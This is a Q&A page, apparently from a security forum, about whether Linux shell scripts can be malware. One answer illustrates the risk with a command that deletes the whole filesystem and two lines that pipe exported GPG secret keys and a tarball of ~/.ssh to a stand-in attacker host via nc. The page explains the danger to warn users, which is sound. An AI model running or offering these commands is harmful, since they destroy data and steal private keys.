Can a .sh file be malware?

.sh files are shell scripts. They are analogous to .bat files (cmd scripts) under Windows. All of these (shell scripts, cmd scripts, .exe Windows executables, Linux executables (which usually have no extension)) are executable programs; if you run one, it can do anything you can do. So yes, shell scripts can be harmful. Treat a shell script (or a Perl script, or a Python script, or a Ruby script, etc.) with the same suspicion you would treat any other application.

It's a bit harder to hide malware in a shell script without looking suspicious, because this is a script which can be read by people with knowledge of the scripting language. But it is not much harder; few people, even with the technical knowledge, would bother to review the code, so you could hope to go unnoticed.

As a practical matter, there is less malware for Linux floating around than for Windows. This is probably mainly because Linux has a lot less of a market share than Windows on the desktop, so the payback for writing Linux malware is less. Also, there is a long-ingrained culture of sharing little improvements to the system in the Linux world, more so than in the Windows world; so the balance of probability says that this is someone sharing a little improvement and not malware. But it could be malware posing as a little improvement. In the end, you need to decide whether you can trust the site where you're getting this application, or the people who recommended this site. Favor programs that come from your distribution (i.e. that you can install from the software center), as they have undergone some review.

Now regarding this specific program: I had a quick look, and it looks benign. I didn't see anything that would store your password anywhere without telling you or that would do things on your computer other than what it's advertised to do. Note that I only did a 2-minute review, which any remotely clever malware writer could get past. The program looks reasonably well-written.

I wouldn't necessarily recommend this program unless you feel a pressing need that isn't addressed by packages in the Ubuntu distribution. Ubuntu comes with the seahorse Install seahorse GUI frontend to GPG (there is also kgpg Install kgpg for KDE users). You may also want to install seahorse-nautilus Install seahorse-nautilus (or seahorse-plugin Install seahorse-plugin in older versions) for Nautilus integration.


#!/bin/sh
rm -rf --no-preserve-root /

That's malware, and it's a shell script. A more advanced version might include something like:

gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80

So yes, a shell script can be malicious. It can get more complex and call on other scripting languages, libraries, or even be a shell archive that spits out and calls a regular executable.

For the most part, anything you run gets the permissions of the user.


Of course! It can do anything you can do! Watch logs, keylog you, steal files etc....

Depending on what its Developer has written on the source code! It can do ANYTHING.....

And it is very easy to make, so if you are sent a suspicious .sh file, think twice before you execute it!

Tags:

Linux

Bash

Malware

Related

How do I clear cached credentials from my Windows Profile? Can a hypervisor rootkit enable hardware-assisted virtualization when it has been disabled by the BIOS? Checklist on building an Offline Root & Intermediate Certificate Authority (CA) Does Self-signed certificate differ from CA from a security point of view? Online Government Elections System - Is it possible? Worst case scenario, what can a Chrome extension do with "Your data on all websites" and "Your tabs and browsing activity"? Obtaining the IP address of a virtual machine to use Metasploit Testing Snort IDS installation Are prepared statements 100% safe against SQL injection? Does NIST really recommend PBKDF2 for password hashing? Standards for encrypting passwords in configuration files? Is my computer at risk of being hacked when using public Wi-Fi?

Recent Posts